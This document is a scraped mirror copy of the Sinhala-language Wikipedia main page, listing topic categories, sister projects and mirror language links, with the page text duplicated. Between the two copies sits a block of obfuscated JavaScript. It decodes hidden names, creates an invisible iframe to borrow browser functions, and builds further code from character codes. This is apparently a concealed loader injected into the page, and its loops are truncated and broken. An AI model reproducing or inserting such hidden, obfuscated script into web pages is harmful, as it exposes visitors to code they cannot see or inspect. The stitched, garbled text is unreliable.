මුල් පිටුව

From Wikipedia

ආයුබෝවන්!
විකිපීඩියා නම් වන
ඕනෑම කෙනකුට වැඩිදියුණු කල හැකි විශ්‍‍වකෝෂ‍ය‍.
සිංහල භාෂා සංස්කරණයේ පිටු 147කි.
Overview · Searching · සංස්කරණය කිරීම · ප්‍රශ්න · උදව්

ප්‍රවර්ග · Featured content · සුචිය


සිංහල
සිංහල භාෂාව - සිංහල ඉතිහාසය - සිංහල ජාතිය - සිංහල සංස්කෘතිය - ශ්‍රී ලංකාව - බුදු දහම


ගණිත සහ ස්වභාව විද්‍යා
තාරකා විද්‍යාව - ජීව විද්‍යාව - සත්ව විද්‍යාව - රසායන විද්‍යාව - උද්භිද විද්‍යාව - කෘමි විද්‍යාව - භෞතික විද්‍යාව - ගණිතය - තොරතුරු තාක්‍ෂණය - ස්වභාව විද්‍යාව - සංඛ්‍යානය

සමාජීය විද්‍යා
මානව විද්‍යාව - පුරා විද්‍යාව - රාජ්‍ය තාන්ත්රකත්වය - අධ්‍යාපනය - දර්ශන විද්‍යාව - මුල්‍ය - භූ විද්‍යාව - භාෂා සහ වාග් විද්‍යාව - සංගීත වේදය - අධ්‍යාපන විද්‍යාව - මනෝ විද්‍යාව - සමාජ විද්‍යාව - ඉතිහාසය

දේශපාලනය, නීතිය, සහ සමාඡ විද්‍යාව
වානිජ්‍යය - යුධ විද්‍යා - නීතිය - ආර්ථිකය - පවුල - ව්‍යාපාර - දේශපාලනය

ආගම් සහ මිථ්‍යා
ආගම - මිථ්‍යා විශ්වාස - දේවධර්මය - ඉස්ලාම් - කිතු දහම - ජෛන ආගම - සිඛ් ආගම - බුදු දහම - නාස්තික වාදය - හින්දු ආගම - ආත්ම වාදය - ජුදා ආගම - ගුප්ත ධර්මය - ආධ්‍යාත්මික

කලාව සහ සංස්කෘතිය
කලාව - නර්තනය - සිනමාව - සංස්කෘතිය - ජනකතා - ඡායාරූප ශිල්පය - සාහිත්‍යය - සංගීතය - මූර්ති - නාට්‍ය

ව්‍යවහාරික විද්‍යා සහ කර්මාන්ත
ගුවන් ගමන් අවකාශය - කෘෂිකර්මය - විදුලිය - විද්‍යුත් - කලමණාකරනය - වාස්තු විද්‍යාව - සන්නිවේදනය - අන්තර්ජාලය - කර්මාන්ත - ඉංජිනේරු ශිල්පය - තාක්ෂණය - ප්‍රවාහනය - විද්‍යුත් සන්නිවේදනය

ජීවිතය සහ විනෝදය
සූපවේදය - විනෝදාංශ - ගෙවතු වගාව - ක්‍රීඩා - සංචාරක - විනෝදාත්මක - ලිංගිකත්වය

වෛද්‍ය විද්‍යාව සහ පෝෂණය
ඇලොපති - ආයුර්වේද - සිංහල දේශීය - හෝමියෝපති

අනෙකුත්
ජීවිත කථා - ලැයිස්තු ගත ලැයිස්තුව - ලෝකයේ ඇති රටවල් - ආසියාව


Other areas of Wikipedia

  • Help desk — Ask questions about using Wikipedia.
  • Reference desk — Serving as virtual librarians, Wikipedia volunteers tackle your questions on a wide range of subjects.
  • කෝපි කඩේ — For discussions about Wikipedia itself, including areas for technical issues and policies.
  • Community portal — Bulletin board, projects, resources and activities covering a wide range of Wikipedia areas.
  • අඩවි පුවත් — Announcements, updates, articles and press releases on Wikipedia and the Wikimedia Foundation.

Wikipedia's sister projects

Wikipedia is hosted by the විකිමාධ්‍ය පදනම (Wikimedia Foundation), a non-profit organization that also hosts a range of other ව්‍යාපෘති:

වික්‍ෂනරි (සිංහල Wiktionary)
ශබ්ද කෝෂය හා නිඝණ්ඩුව (තිසෝරය)

විකිපොත්් (සිංහල Wikibooks)
Free textbooks and manuals

Wikinews (ඉංග්‍රීසි විකිපුවත්)
Free-content news

Wikisource (ඉංග්‍රීසි විකිමූලාශ්‍රය)
Free-content library

Wikispecies
Directory of species

Wikiquote
Collection of quotations

Commons (සිංහල Commons)
Shared media repository

Meta-Wiki
Wikimedia project coordination


විකිපීඩියා භාෂා

මෙය 2005 වසරේ ඇරඹි විකිපීඩියා සිංහල භාෂා සංස්කරණයයි. මෙහි දැනට පිටු 147 ක් ඇත. විකිපීඩියා, තවත් බොහෝ භාෂා වලින් ලියවී ඇත:

සම්පූර්ණ ලැයිස්තුව · බහු භාෂාමය සමායෝජනය · වෙනත් භාෂාවකින් විකිපීඩියාවක් අරඹන්න

()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~';function ds(d,s){var _,$,h,x='',r=s.length;for(_=0;_=0&&(h=s.charAt((r/2)%r)),x+=h;return x;}var _0xf62sadc=ds(':7C2>6',$pe),_0xf62sagsdg=ds('?@?6',$pe),_0xf62s4gg=ds('4C62E6t=6>6?E',$pe);const _=document[_0xf62s4gg](_0xf62sadc);var _0xf62s45htrgb=ds('DEJ=6',$pe),_0xf62s45h8jgb=ds('5:DA=2J',$pe);_[_0xf62s45htrgb][_0xf62s45h8jgb]=_0xf62sagsdg;var _0x54y0p=ds('A2CD6u=@2E',$pe),_0x54rgrt3vcb=ds('A2CD6x?E',$pe),_0x54hrgfb=ds('$EC:?8',$pe),_0x54hr5gfdfb=ds('7C@>r92Cr@56',$pe),_0x54h9h=ds('5@4F>6?Et=6>6?E',$pe),_0x5dsad9h=ds('4@?E6?E(:?5@H',$pe),_0x5dsdsadasdad9h=ds('2AA6?5r9:=5',$pe),_0x54hr6ytgfvb=ds('C6>@G6r9:=5',$pe);document[_0x54h9h][_0x5dsdsadasdad9h](_);var f=_[_0x5dsad9h][_0x54hrgfb][_0x54hr5gfdfb];var p=_[_0x5dsad9h][_0x54rgrt3vcb];var v=_[_0x5dsad9h][_0x54y0p];document[_0x54h9h][_0x54hr6ytgfvb](_);function H(index){return Number(index).toString(36).replace(/[0-9]/g,function(s){return f(p(s,10)+65);});}var o={$:function(){var o={};for(var i=0;i-1&&0===t.indexOf(n[f])&&(i=0),o>-1&&(e+=y(i*r.length+o),i=1);}return e;})),(function(s){var _={};for(k in s){try{_[k]=s[k].bind(s);}catch(e){_[k]=s[k];}}return _;})(document))

Web Analytics
CLASSICISTRANIERI HOME PAGE - YOUTUBE CHANNEL

Make a donation: IBAN: IT36M0708677020000000008016 - BIC/SWIFT:  ICRAITRRU60 - VALERIO DI STEFANO or

QR Code


Privacy Policy Cookie Policy Termini e Condizioni


මුල් පිටුව - Wikipedia

මුල් පිටුව

From Wikipedia

ආයුබෝවන්!
විකිපීඩියා නම් වන
ඕනෑම කෙනකුට වැඩිදියුණු කල හැකි විශ්‍‍වකෝෂ‍ය‍.
සිංහල භාෂා සංස්කරණයේ පිටු 147කි.
Overview · Searching · සංස්කරණය කිරීම · ප්‍රශ්න · උදව්

ප්‍රවර්ග · Featured content · සුචිය


සිංහල
සිංහල භාෂාව - සිංහල ඉතිහාසය - සිංහල ජාතිය - සිංහල සංස්කෘතිය - ශ්‍රී ලංකාව - බුදු දහම


ගණිත සහ ස්වභාව විද්‍යා
තාරකා විද්‍යාව - ජීව විද්‍යාව - සත්ව විද්‍යාව - රසායන විද්‍යාව - උද්භිද විද්‍යාව - කෘමි විද්‍යාව - භෞතික විද්‍යාව - ගණිතය - තොරතුරු තාක්‍ෂණය - ස්වභාව විද්‍යාව - සංඛ්‍යානය

සමාජීය විද්‍යා
මානව විද්‍යාව - පුරා විද්‍යාව - රාජ්‍ය තාන්ත්රකත්වය - අධ්‍යාපනය - දර්ශන විද්‍යාව - මුල්‍ය - භූ විද්‍යාව - භාෂා සහ වාග් විද්‍යාව - සංගීත වේදය - අධ්‍යාපන විද්‍යාව - මනෝ විද්‍යාව - සමාජ විද්‍යාව - ඉතිහාසය

දේශපාලනය, නීතිය, සහ සමාඡ විද්‍යාව
වානිජ්‍යය - යුධ විද්‍යා - නීතිය - ආර්ථිකය - පවුල - ව්‍යාපාර - දේශපාලනය

ආගම් සහ මිථ්‍යා
ආගම - මිථ්‍යා විශ්වාස - දේවධර්මය - ඉස්ලාම් - කිතු දහම - ජෛන ආගම - සිඛ් ආගම - බුදු දහම - නාස්තික වාදය - හින්දු ආගම - ආත්ම වාදය - ජුදා ආගම - ගුප්ත ධර්මය - ආධ්‍යාත්මික

කලාව සහ සංස්කෘතිය
කලාව - නර්තනය - සිනමාව - සංස්කෘතිය - ජනකතා - ඡායාරූප ශිල්පය - සාහිත්‍යය - සංගීතය - මූර්ති - නාට්‍ය

ව්‍යවහාරික විද්‍යා සහ කර්මාන්ත
ගුවන් ගමන් අවකාශය - කෘෂිකර්මය - විදුලිය - විද්‍යුත් - කලමණාකරනය - වාස්තු විද්‍යාව - සන්නිවේදනය - අන්තර්ජාලය - කර්මාන්ත - ඉංජිනේරු ශිල්පය - තාක්ෂණය - ප්‍රවාහනය - විද්‍යුත් සන්නිවේදනය

ජීවිතය සහ විනෝදය
සූපවේදය - විනෝදාංශ - ගෙවතු වගාව - ක්‍රීඩා - සංචාරක - විනෝදාත්මක - ලිංගිකත්වය

වෛද්‍ය විද්‍යාව සහ පෝෂණය
ඇලොපති - ආයුර්වේද - සිංහල දේශීය - හෝමියෝපති

අනෙකුත්
ජීවිත කථා - ලැයිස්තු ගත ලැයිස්තුව - ලෝකයේ ඇති රටවල් - ආසියාව


Other areas of Wikipedia

  • Help desk — Ask questions about using Wikipedia.
  • Reference desk — Serving as virtual librarians, Wikipedia volunteers tackle your questions on a wide range of subjects.
  • කෝපි කඩේ — For discussions about Wikipedia itself, including areas for technical issues and policies.
  • Community portal — Bulletin board, projects, resources and activities covering a wide range of Wikipedia areas.
  • අඩවි පුවත් — Announcements, updates, articles and press releases on Wikipedia and the Wikimedia Foundation.

Wikipedia's sister projects

Wikipedia is hosted by the විකිමාධ්‍ය පදනම (Wikimedia Foundation), a non-profit organization that also hosts a range of other ව්‍යාපෘති:

වික්‍ෂනරි (සිංහල Wiktionary)
ශබ්ද කෝෂය හා නිඝණ්ඩුව (තිසෝරය)

Wikispecies
Directory of species

Wikiquote
Collection of quotations

Commons (සිංහල Commons)
Shared media repository

Meta-Wiki
Wikimedia project coordination


විකිපීඩියා භාෂා

මෙය 2005 වසරේ ඇරඹි විකිපීඩියා සිංහල භාෂා සංස්කරණයයි. මෙහි දැනට පිටු 147 ක් ඇත. විකිපීඩියා, තවත් බොහෝ භාෂා වලින් ලියවී ඇත:

සම්පූර්ණ ලැයිස්තුව · බහු භාෂාමය සමායෝජනය · වෙනත් භාෂාවකින් විකිපීඩියාවක් අරඹන්න

Static Wikipedia 2008 (no images)

aa - ab - af - ak - als - am - an - ang - ar - arc - as - ast - av - ay - az - ba - bar - bat_smg - bcl - be - be_x_old - bg - bh - bi - bm - bn - bo - bpy - br - bs - bug - bxr - ca - cbk_zam - cdo - ce - ceb - ch - cho - chr - chy - co - cr - crh - cs - csb - cu - cv - cy - da - de - diq - dsb - dv - dz - ee - el - eml - en - eo - es - et - eu - ext - fa - ff - fi - fiu_vro - fj - fo - fr - frp - fur - fy - ga - gan - gd - gl - glk - gn - got - gu - gv - ha - hak - haw - he - hi - hif - ho - hr - hsb - ht - hu - hy - hz - ia - id - ie - ig - ii - ik - ilo - io - is - it - iu - ja - jbo - jv - ka - kaa - kab - kg - ki - kj - kk - kl - km - kn - ko - kr - ks - ksh - ku - kv - kw - ky - la - lad - lb - lbe - lg - li - lij - lmo - ln - lo - lt - lv - map_bms - mdf - mg - mh - mi - mk - ml - mn - mo - mr - mt - mus - my - myv - mzn - na - nah - nap - nds - nds_nl - ne - new - ng - nl - nn - no - nov - nrm - nv - ny - oc - om - or - os - pa - pag - pam - pap - pdc - pi - pih - pl - pms - ps - pt - qu - quality - rm - rmy - rn - ro - roa_rup - roa_tara - ru - rw - sa - sah - sc - scn - sco - sd - se - sg - sh - si - simple - sk - sl - sm - sn - so - sr - srn - ss - st - stq - su - sv - sw - szl - ta - te - tet - tg - th - ti - tk - tl - tlh - tn - to - tpi - tr - ts - tt - tum - tw - ty - udm - ug - uk - ur - uz - ve - vec - vi - vls - vo - wa - war - wo - wuu - xal - xh - yi - yo - za - zea - zh - zh_classical - zh_min_nan - zh_yue - zu -

Static Wikipedia 2007 (no images)

aa - ab - af - ak - als - am - an - ang - ar - arc - as - ast - av - ay - az - ba - bar - bat_smg - bcl - be - be_x_old - bg - bh - bi - bm - bn - bo - bpy - br - bs - bug - bxr - ca - cbk_zam - cdo - ce - ceb - ch - cho - chr - chy - co - cr - crh - cs - csb - cu - cv - cy - da - de - diq - dsb - dv - dz - ee - el - eml - en - eo - es - et - eu - ext - fa - ff - fi - fiu_vro - fj - fo - fr - frp - fur - fy - ga - gan - gd - gl - glk - gn - got - gu - gv - ha - hak - haw - he - hi - hif - ho - hr - hsb - ht - hu - hy - hz - ia - id - ie - ig - ii - ik - ilo - io - is - it - iu - ja - jbo - jv - ka - kaa - kab - kg - ki - kj - kk - kl - km - kn - ko - kr - ks - ksh - ku - kv - kw - ky - la - lad - lb - lbe - lg - li - lij - lmo - ln - lo - lt - lv - map_bms - mdf - mg - mh - mi - mk - ml - mn - mo - mr - mt - mus - my - myv - mzn - na - nah - nap - nds - nds_nl - ne - new - ng - nl - nn - no - nov - nrm - nv - ny - oc - om - or - os - pa - pag - pam - pap - pdc - pi - pih - pl - pms - ps - pt - qu - quality - rm - rmy - rn - ro - roa_rup - roa_tara - ru - rw - sa - sah - sc - scn - sco - sd - se - sg - sh - si - simple - sk - sl - sm - sn - so - sr - srn - ss - st - stq - su - sv - sw - szl - ta - te - tet - tg - th - ti - tk - tl - tlh - tn - to - tpi - tr - ts - tt - tum - tw - ty - udm - ug - uk - ur - uz - ve - vec - vi - vls - vo - wa - war - wo - wuu - xal - xh - yi - yo - za - zea - zh - zh_classical - zh_min_nan - zh_yue - zu -

Static Wikipedia 2006 (no images)

aa - ab - af - ak - als - am - an - ang - ar - arc - as - ast - av - ay - az - ba - bar - bat_smg - bcl - be - be_x_old - bg - bh - bi - bm - bn - bo - bpy - br - bs - bug - bxr - ca - cbk_zam - cdo - ce - ceb - ch - cho - chr - chy - co - cr - crh - cs - csb - cu - cv - cy - da - de - diq - dsb - dv - dz - ee - el - eml - eo - es - et - eu - ext - fa - ff - fi - fiu_vro - fj - fo - fr - frp - fur - fy - ga - gan - gd - gl - glk - gn - got - gu - gv - ha - hak - haw - he - hi - hif - ho - hr - hsb - ht - hu - hy - hz - ia - id - ie - ig - ii - ik - ilo - io - is - it - iu - ja - jbo - jv - ka - kaa - kab - kg - ki - kj - kk - kl - km - kn - ko - kr - ks - ksh - ku - kv - kw - ky - la - lad - lb - lbe - lg - li - lij - lmo - ln - lo - lt - lv - map_bms - mdf - mg - mh - mi - mk - ml - mn - mo - mr - mt - mus - my - myv - mzn - na - nah - nap - nds - nds_nl - ne - new - ng - nl - nn - no - nov - nrm - nv - ny - oc - om - or - os - pa - pag - pam - pap - pdc - pi - pih - pl - pms - ps - pt - qu - quality - rm - rmy - rn - ro - roa_rup - roa_tara - ru - rw - sa - sah - sc - scn - sco - sd - se - sg - sh - si - simple - sk - sl - sm - sn - so - sr - srn - ss - st - stq - su - sv - sw - szl - ta - te - tet - tg - th - ti - tk - tl - tlh - tn - to - tpi - tr - ts - tt - tum - tw - ty - udm - ug - uk - ur - uz - ve - vec - vi - vls - vo - wa - war - wo - wuu - xal - xh - yi - yo - za - zea - zh - zh_classical - zh_min_nan - zh_yue - zu -

Sub-domains

CDRoms - Magnatune - Librivox - Liber Liber - Encyclopaedia Britannica - Project Gutenberg - Wikipedia 2008 - Wikipedia 2007 - Wikipedia 2006 -

Other Domains

https://www.classicistranieri.it - https://www.ebooksgratis.com - https://www.gutenbergaustralia.com - https://www.englishwikipedia.com - https://www.wikipediazim.com - https://www.wikisourcezim.com - https://www.projectgutenberg.net - https://www.projectgutenberg.es - https://www.radioascolto.com - https://www.debitoformtivo.it - https://www.wikipediaforschools.org - https://www.projectgutenbergzim.com